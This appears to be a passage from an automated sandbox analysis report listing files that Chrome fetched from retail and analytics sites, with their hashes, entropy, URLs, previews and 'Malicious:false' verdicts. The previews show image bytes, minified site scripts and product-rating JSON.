                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 r........*P.P.>1..B.!!...h ....i....s(^Sh.Z..m...=...y....yGe.....@..d.....U.}....T..<1.+b...dm.#gM.Q2.z..+.z)..BN...;..6... Q.?........!..?TYA..w..(K{..E.g....'.[.f.....L...U....b.-$...>7I..cF.t.%.O...XkxS..3..^..K.l;........a..3..:.~~...#..\.....&?.e..pY.3?j}........si...[.aez=.#..~AE\..}..M.m..*.Z.".....:...q.W.-\.m.N.&.|gi.'D.O.Z.d....O.Y.....tD...nk.@F.o...oU..(..N..>(..'8c... r*S..bT...'..f".8.*.:....&.F.t..?.eBD/....O...v.4j.I.L.....FQ..).y..F..?..+_B}..p...h.....!.CI.%@.U.=Cet..k..I.%(z7.,X.U..F..:
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (468), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):468
                                                                                                                                                                                    Entropy (8bit):5.38199215082562
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:ZaiGmFMZqWkoXkZMk4smLkp0ZgFqOFXjV:Z8cMUW1jsmLk6AFV
                                                                                                                                                                                    MD5:1479DDBCB4AB3402CE6D1A169762E5AE
                                                                                                                                                                                    SHA1:93752F005ED143884743FE76A8755292D7BF6514
                                                                                                                                                                                    SHA-256:993C19AD16D85E3A7DA2E38C84F4FB4B1B9E15EF34EB3291098EB639337770A8
                                                                                                                                                                                    SHA-512:B52AE43A240461AF43589BBB6413A731BEB984ECC1EE910F731CF8A03C9921082424CD4C0FDF1DE371F54438670C73BC8177724A8F7C1100DFE763EF4EB783F8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/homepage/_next/static/aC29oTkIKAsd1LwkLHeYM/_buildManifest.js
                                                                                                                                                                                    Preview:self.__BUILD_MANIFEST={__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/_error":["static/chunks/pages/_error-3c9a37b9888d2d4e.js"],"/health":["static/chunks/pages/health-18e9910af7a8cb7a.js"],"/main":["static/css/ad6fb076e0e5cbef.css","static/chunks/735-6ba73dac84dad3b1.js","static/css/0aa6b98441eac8ac.css","static/chunks/pages/main-4d3627b5fb2c9f5d.js"],sortedPages:["/_app","/_error","/health","/main"]},self.__BUILD_MANIFEST_CB&&self.__BUILD_MANIFEST_CB();
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1719
                                                                                                                                                                                    Entropy (8bit):6.428597652817951
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZYNPkQVAgiTmF+OtPmozJJFPJynj4tO9HX+:NBIl/XflVxuPqVTy+ieSJJFJynj4p
                                                                                                                                                                                    MD5:E819409AF73DDCA35D00077576C79DED
                                                                                                                                                                                    SHA1:D2B396A5C44BABD75D9439476BB25531DE7A3951
                                                                                                                                                                                    SHA-256:0ABD4A75652F2DF97F5C8E44A8859EA48823C204FFE2D9119AD681896EE207FF
                                                                                                                                                                                    SHA-512:1F35BEB476112444F17CA68ED29EE69FF7CE885464A626CC668F49D0F129475A59B2EADD7C2899C2CF362BE61CD66FEB57D4E0E2B9E73908780CD72C3D66F18D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P....................................................................................................{.\...b.X.....>.^...)...3y.ZN..Dzs........Z./i'..7*P..............3........................!...1."A.2Qa...@..#0B..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):31196
                                                                                                                                                                                    Entropy (8bit):7.976537747464128
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:RctBZ1BUR9eYbhCN9OXFB/wykGZt39pwEtw8+42iA:mt/TKoOHtkatHtw53iA
                                                                                                                                                                                    MD5:73D66A622F8859BCD8458F3EB5D20BD4
                                                                                                                                                                                    SHA1:F7B0FCA1EF7C7E452427525AD31C506EA6FD12D7
                                                                                                                                                                                    SHA-256:C6DEE71C68C8C604F6EC7D7E1CB372157603F93B5D27316126A7C8682D70D4F6
                                                                                                                                                                                    SHA-512:F524D8597BBD5747056134F0EFAA9F3CE92A0D7C38136D7DD169E6A6337B5AD71718DBABE833F516B6D9B17E69FB05018CC881762BCE236FD4846DDA3E998595
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/10212024-MOPS-A3_Desktop.jpg?v=1729531877&width=650
                                                                                                                                                                                    Preview:RIFF.y..WEBPVP8X....(......m..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 Dw..Px...*..n.>9..C.!..JM. .......>gRc]yv`x.)B.E....{?.].s_....'./._...5.........O......D....\...K...?.....~......c.;......}....C........._...}m.....{.G.o.?...................t........Q.#......././e...}....d.......K....?.?.?........[.'...../.......@?....<.......?....G....._..-..z[...........k./c...;.g................2...7.....;.o...?.~.....................?......*............g.....?....z?......G........../.......?...>L...7......y.L...7...S.3.w..........;........t....=.?a....4.-..LP._Njb.$..5..-..LP._Njb.$..5..-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (1522)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1523
                                                                                                                                                                                    Entropy (8bit):5.344008634188652
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:irjULQyolDRF9f34+dVuGGdt178co7pJNoOYS7VduiqNanUenfe:is87Fo+dV+7VCpJ6q+/aZnfe
                                                                                                                                                                                    MD5:DD0B8E0B63C262D76924B97815F4AB51
                                                                                                                                                                                    SHA1:BEB170DF2E222AE4986B2EA37C831D5BBDED7CA7
                                                                                                                                                                                    SHA-256:8D3C4D95BD12A93083457A6016BBC62EC5CB493E76B234464485882A68FACD94
                                                                                                                                                                                    SHA-512:9980F2DC0E396E430747A83476D4A110C97CC7C68B6EC3F46A1D6BF23611D801C87BF62F2F5881DD0EE83899EA00FAE56270719B392C1E2E26F4C6F27916E996
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useUnauthenticatedErrorModal.AwvSMfsF.js
                                                                                                                                                                                    Preview:import{c as d,d as p,cs as f,D as g,T as y,lw as S,v as C,l as b,aO as v,q as k,cx as h,cB as w,cI as P}from"./app.DfgMZONA.js";var E=(o=>(o.Generic="generic",o.SignInFailed="sign_in_failed",o.ContinueWithShopPay="continue_with_shop_pay",o))(E||{});const I=d(null);function x(){return p(I)}const M=o=>({backgroundColor:e,foregroundColor:n})=>{const s=m(e),t=m(n),a=Math.max(s,t),r=Math.min(s,t),c=(a+.05)/(r+.05);return{isValidContrast:c>=o,ratio:Math.round(c*100)/100}},_=M(3.06);function m(o){const n=o.toRgbTuple().map(s=>{const t=s/255;return t<=.04045?t/12.92:((t+.055)/1.055)**2.4});return .2126*n[0]+.7152*n[1]+.0722*n[2]}const u=new S(0,0,100);function A({foregroundColor:o,backgroundColor:e,section:n="main"}){const s=f(),{colors:t}=g(),a=s[n];let r=u;if(e!==void 0)r=e;else if(a.colorScheme==="inherit"){const{background:i,colorScheme:l}=s.canvas;l&&i!=="transparent"&&(r=t.schemes?.[l]?.base?.background??u)}else{const i=a.colorScheme;r=i?t.schemes?.[i]?.base?.background??u:u}const{isVali
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):63154
                                                                                                                                                                                    Entropy (8bit):5.515328895618434
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIT:qYW2Pj5yO7t2ACRg8398olh
                                                                                                                                                                                    MD5:62740B6BA6BF047ADAA119706B21EBE2
                                                                                                                                                                                    SHA1:3B2DDB2224EDDCEADAD01F7D695D41C975FB3C29
                                                                                                                                                                                    SHA-256:58DFE672FF65D9EBAC564609D6454A853D200FE4B077139B2CAD90A0319240BE
                                                                                                                                                                                    SHA-512:404935820089FF475C6BB3CE294DB103FA1BFFE9F79B5CEE8CC8BA01B71563D1227FF92AB20A9DB7728E9FBBA0644025757BC42DA2E10C1EE61BFE36C4EE5B07
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-117342524@10/sandbox/modern/
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (35788), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):35806
                                                                                                                                                                                    Entropy (8bit):5.354321297607842
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:eruQgm8+OGIdHR3rUKOevLVgaJICkv8wxpKhm:que8F5ZR3oexxm
                                                                                                                                                                                    MD5:033CB53DBA312C88798BBA579FC68B40
                                                                                                                                                                                    SHA1:E6A645D3E0680302789C87BABFDDF1A742C7D64A
                                                                                                                                                                                    SHA-256:A1F8F7541A2982D7DF75F73D0234A3F2AFDC8302F361078F883D25A3A574BAE4
                                                                                                                                                                                    SHA-512:3CB56D5756C519F72AA24FDF1AC03298CD8010FB6A429A7439A8C19BF75C9C813EB8F224C2A31ECECA53C1EF0101FD74705ADAB86E464E616A0316F5C04DB8FA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://bat.bing.com/p/insights/s/0.7.49
                                                                                                                                                                                    Preview:!function(){"use strict";var t=Object.freeze({__proto__:null,get queue(){return qe},get start(){return Ae},get stop(){return We},get track(){return Se}}),e=Object.freeze({__proto__:null,get clone(){return rn},get compute(){return an},get data(){return Ge},get keys(){return Ze},get reset(){return on},get start(){return en},get stop(){return cn},get trigger(){return nn},get update(){return un}}),n=Object.freeze({__proto__:null,get check(){return pn},get compute(){return vn},get data(){return Be},get start(){return fn},get stop(){return mn},get trigger(){return gn}}),r=Object.freeze({__proto__:null,get compute(){return On},get data(){return wn},get log(){return _n},get reset(){return xn},get start(){return bn},get stop(){return kn},get updates(){return yn}}),a=Object.freeze({__proto__:null,get callbacks(){return Tn},get clear(){return Cn},get consent(){return jn},get data(){return En},get id(){return In},get metadata(){return Sn},get save(){return Hn},get start(){return Nn},get stop(){ret
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1180
                                                                                                                                                                                    Entropy (8bit):4.739071859478317
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfUQf8PLp2LVxGVL4/q1zALZv6Lmx+LWfQXRqaLj1yLfWLhOfVYLV:YBT8PLULzGVLhzALwLNLWf+LjcL+L0VM
                                                                                                                                                                                    MD5:E6077BFBF0BE62A68B7A8DD5286F721F
                                                                                                                                                                                    SHA1:BFBADA4956F122C96AE37B4970294326AA2A1D71
                                                                                                                                                                                    SHA-256:560390AD2AD69E3C6D7A6C07A7B46ADBFDF126FB3155AD5504BED758F9210A46
                                                                                                                                                                                    SHA-512:E7DBDFC51141CF817EBA11063B56AD829AFD9E1A601E018DB005B2242A8E6BCE539C91CAD9FD47E536D28260465251BF74A7451EDBE01B3892E9D582F5A2D852
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/33332136%2C35317115%2C6986413%2C35523736%2C14638099%2C33062936%2C37753800%2C31028687%2C36272470%2C31873781/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"33062936","rollup":{"average_rating":4.15,"rating_count":47,"review_count":47,"answered_questions":0}},{"page_id":"33332136","rollup":{"average_rating":4.63,"rating_count":19,"review_count":19,"answered_questions":0}},{"page_id":"35523736","rollup":{"average_rating":4.63,"rating_count":8,"review_count":8,"answered_questions":0}},{"page_id":"35317115","rollup":{"average_rating":4.67,"rating_count":15,"review_count":15,"answered_questions":0}},{"page_id":"36272470","rollup":{"average_rating":4.51,"rating_count":74,"review_count":74,"answered_questions":0}},{"page_id":"37753800","rollup":{"average_rating":4.5,"rating_count":16,"review_count":16,"answered_questions":0}},{"page_id":"6986413","rollup":{"average_rating":3.97,"rating_count":147,"review_count":147,"answered_questions":0}},{"page_id":"14638099","rollup":{"average_rating":4.56,"rating_count":349,"review_count":349,"answered_questions":0}},{"page_id":"31028687","rollup":{"average_rating":4.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4103), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4103
                                                                                                                                                                                    Entropy (8bit):5.573234278412048
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:/2XjHtorvlP5rJ02moGkUtS6NYVbxb0wCp9s2ALwZxa:eJoTlPHfmookbjCpi4Zs
                                                                                                                                                                                    MD5:16D5D552603D86726AE439FC61299D42
                                                                                                                                                                                    SHA1:42E252A7AF04292577789C2DF07D88EF749A2B4C
                                                                                                                                                                                    SHA-256:9CA07DF45944B8440AE6241E4A017DB2B6E4600E5F647D3180C96877198C3552
                                                                                                                                                                                    SHA-512:F26A316E1D94DE19317113B75E1292AB1410D471E5F68BB24F93485F550B486AE6CB7EF9AF0B09F2A5AD4B3B57217A3A726BDA4265B8E0B22CF1E32296ACB2CD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ct.pinterest.com/static/ct/token_create.js
                                                                                                                                                                                    Preview:!function(t){var r={};function i(n){var e;return(r[n]||(e=r[n]={i:n,l:!1,exports:{}},t[n].call(e.exports,e,e.exports,i),e.l=!0,e)).exports}i.m=t,i.c=r,i.d=function(n,e,t){i.o(n,e)||Object.defineProperty(n,e,{enumerable:!0,get:t})},i.r=function(n){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(n,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(n,"u",{value:!0})},i.t=function(e,n){if(1&n&&(e=i(e)),8&n)return e;if(4&n&&"object"==typeof e&&e&&e.u)return e;var t=Object.create(null);if(i.r(t),Object.defineProperty(t,"default",{enumerable:!0,value:e}),2&n&&"string"!=typeof e)for(var r in e)i.d(t,r,function(n){return e[n]}.bind(null,r));return t},i.n=function(n){var e=n&&n.u?function(){return n.default}:function(){return n};return i.d(e,"a",e),e},i.o=function(n,e){return Object.prototype.hasOwnProperty.call(n,e)},i.p="",i(i.s=0)}([function(n,e,t){var r,i,t=t(1);try{r="A7JYkbIvWKmS8mWYjXO12SIIsfPdI7twY91Y3LWOV/YbZmN1ZhYv8O+Zs6/IPCfBE99aV9tIC8sWZSCN09vf7gkAAACWey
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1696
                                                                                                                                                                                    Entropy (8bit):6.901797484429255
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:aLIl/Xfl1/o+HX27hUhCAWmaqhzDN11OsIsp:OIl/Xjz27h1hteHNiJ0
                                                                                                                                                                                    MD5:E8E8EC52191BA89625F3158B0058516C
                                                                                                                                                                                    SHA1:14DCC94255E34ABAAE62545961821F3EC28A52A6
                                                                                                                                                                                    SHA-256:491BE222F9C1D6AA037CBDA74C96DF42D73E10F2AF449AB6FDEDE2B98ACA7DB3
                                                                                                                                                                                    SHA-512:7D7323B49A9A308C80B6A5D111595093ABA0B8D0AD3F37738CD3A80E38C20085943552FA52561B7CF48D8382B2218C4BD07C45943A9FC96409A1EFDDE9F54762
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_49f50909-1960-49fa-8641-f465aa218aaa.jpg?v=1729322983&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!!.[.. ....g.D.........f.....}...m5....ox..|c.......O...{../.....G.0nS..^.........M.l.2...w.."O=I.......I.jx.)G.CI...8OmM7!.W.z.H....*^.-.......=..5...e8......j..E..$......q....?......&....v.p..U.......7.7..5C. ....U..."6v.F..)...4'..L4..^h..|S0:.6|)F.....G.aMS..v.v.....4..h.qFG.|..,.....;1......L/2.7...:.K.Y..F.&..Z..J.6...?I.#.b.je.{FK....F.J._..Wca.h.y.._.....E=.N.k..$...].. ...(....R.l.....@;...R......sP|....@t."w:<.0G..;.0lx^...Bw..F$.6Z?&......{..1P.5I.BM.]".2-.5....O..~z..[..n..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4289
                                                                                                                                                                                    Entropy (8bit):7.546462374766189
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:NBIl/Xrx9b8JCXSzCbESBRUBPw0Uq8BxG7lG:N2LkCOLSIf78BAI
                                                                                                                                                                                    MD5:62F6AC9664A85A7F0D546036E50AA090
                                                                                                                                                                                    SHA1:51E448E9367159052F63C8C7EFE35A24CA0326BB
                                                                                                                                                                                    SHA-256:1847BED319DE2AF4F78B3470A4A4E9E51B0A6C59AD5E4F97A4C21FF2A6A38051
                                                                                                                                                                                    SHA-512:54FEBF75973E54F72EE3B3B159E4F924ED0431C3C5895196F0BECC2636AEEB8FC6253EE2583253F2C7570D65C9CC020106AC3560C30F94F50B020EE9877C2E14
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P...................................................................................~./c...j.`n.Hv...|.x3D......KJ.jt..s...U..h.....'..QR.|l...D.L}.On...i...*.VW...$oJ.g/N..Z....{..=....5...........l.d.bh.b.:....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1183
                                                                                                                                                                                    Entropy (8bit):4.748678484590553
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YMIfgqWnLH5iLeZiM6pLkqLNpGL6AWL7qsLtmLgESLUqVLV:YBoLnLHILewpL3LNkL6HLjLQLg/LJLV
                                                                                                                                                                                    MD5:2B722B0C0D6275E3CE5CF39862A59DC1
                                                                                                                                                                                    SHA1:A6772E1E62F08228652FC36BAFC23EF16AF7D07F
                                                                                                                                                                                    SHA-256:87F6C8BB522FBFB1B37768B3E21DE5235675A283B3BCE8AA92F4DE73B78F8DEF
                                                                                                                                                                                    SHA-512:201FB0152A097F00FE7D2AE3B2F5AD6B056A90D2C5B5BD68FF99ECB8FD4345FE0F10BF0CF881B0CCA092522843277B04619A2B96361D30246DE4F1B84C4A8D9B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/38169103%2C39181892%2C22835495%2C39904157%2C18104891%2C10673336%2C37459457%2C20000656%2C30886521%2C28273451/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                                                    Preview:{"name":"snippet","results":[{"page_id":"10673336","rollup":{"average_rating":4.14,"rating_count":568,"review_count":568,"answered_questions":0}},{"page_id":"37459457","rollup":{"average_rating":4.09,"rating_count":34,"review_count":34,"answered_questions":0}},{"page_id":"38169103","rollup":{"average_rating":4.5,"rating_count":12,"review_count":12,"answered_questions":0}},{"page_id":"39181892","rollup":{"average_rating":4.5,"rating_count":26,"review_count":26,"answered_questions":0}},{"page_id":"39904157","rollup":{"average_rating":4.92,"rating_count":13,"review_count":13,"answered_questions":0}},{"page_id":"18104891","rollup":{"average_rating":4.61,"rating_count":31,"review_count":31,"answered_questions":0}},{"page_id":"20000656","rollup":{"average_rating":4.72,"rating_count":166,"review_count":166,"answered_questions":0}},{"page_id":"22835495","rollup":{"average_rating":4.76,"rating_count":25,"review_count":25,"answered_questions":0}},{"page_id":"28273451","rollup":{"average_rating":
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):88430
                                                                                                                                                                                    Entropy (8bit):7.995507474285481
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:1536:HLNhPs1zvkXvbh+9PVYopOZQpZWZhMnGsFf4+4OgLePec+6IHYOgrMnDgbXeuffR:HLXPsKkP1pCQpgZkLy6gLeYH3grogbBR
                                                                                                                                                                                    MD5:23A74B61DA382292FBBA4F1613213608
                                                                                                                                                                                    SHA1:C62133E7DC49949895C938B143A6FDE88158022D
                                                                                                                                                                                    SHA-256:869A27CF73F973F56F819107E8EFD7EEB7188AFF77EF0A18AB6C625459BBFA4F
                                                                                                                                                                                    SHA-512:18862D950E2EF0EF7E0EDB25982110F029FA992BBA7F0CAF0E5CF1B4EAB3EAC84C2E2EF8D5CF8D10AEA46704EA7004593385C72B5524BFF79F9F4FDF237616BA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/10212024-MOPS-800X800_A1_Left.jpg?v=1729531877&width=650
                                                                                                                                                                                    Preview:RIFFfY..WEBPVP8X....(.........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .V..P....*....>E..D"...J>.(.D..]og...........zO]..l..is..dJ...../.3.....?u>n97.n~....?.?.?......_....s.+.s.x.M.....O.....}..........o...?...~......s..............O.../.?......z.}.?.../.g...................8>s.....b...s...o.....?.d.....].........?........;..........@................_.!..|........=%...?....E.3.'.....I........._......././.................~[|.~Q.....o......Z...........G.........'./......................../...............e.....l...;.G.7.....?............_...|..:...C.o._.?.......................N
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2909)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3118
                                                                                                                                                                                    Entropy (8bit):5.098331190473996
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:jCv4z8oF+a+1tVaPIoSdT97d4ndBQxKuO:uv4z8c+1tVawokhB4dBQs
                                                                                                                                                                                    MD5:208C33781CC5F61D449C6E2E9BC23C22
                                                                                                                                                                                    SHA1:2852C4F99B41A75CB81107F0F2DE66C92DD4E216
                                                                                                                                                                                    SHA-256:D0686A2C6DC4CB9BAFEAC8E3D620EB7C2CC8CBE5E69935B2311433E452921401
                                                                                                                                                                                    SHA-512:66CBAFAB18218041D0E752479FB3CE1579B4CD14B76E6DCFD24EFC91876E1C6A774372EB3ED176A5AA7D3C821EB72443CC7FBE2349C11C368DC2374F4D839E1E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/MarketsProDisclaimer.D4Dihv-c.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-PayPalExpressButton.RCpoM8XL.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","assets/PayPalExpressButton.h-S8x8hC.css"])))=>i.map(i=>d[i]);.import{ji as y,a as e,T as h,pl as p,gj as g,c0 as b,pm as P,bH as f,bI as v,_ as k,e as m,m as d,aa as o,bt as i,bP as x,V as C,ab as A,aB as s}from"./app.DfgMZONA.js";function B({id:a,children:n}){const t=y(!1);return e(p.Provider,{value:h(()=>({id:a,completeStatusAtom:t}),[a,t]),children:[n,e(M,{})]})}function M(){const a=g(p),n=b(a.completeStatusAtom);return P(a.id,!n),null}const T=f({load:()=>v(()=>k(()=>import("./component-PayPalExpressButton.RCpoM8XL.js"),__vite__mapDeps([0,1,2,3])))});function R(a){const n=a.fundingSource==="venmo"?"Venmo":"PayPal";return e(B,{id:n,children:e(T,{...a})})}function S({isForExpressCheckout:a=!1}){const n=m(),{merchantPolicies:t}=d(),r=a?"small":"base",c=t?.find(_=>_.handle==="subscription-policy"),l=e(o,{appearance:"subdued",size:r,children:n(
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):7546
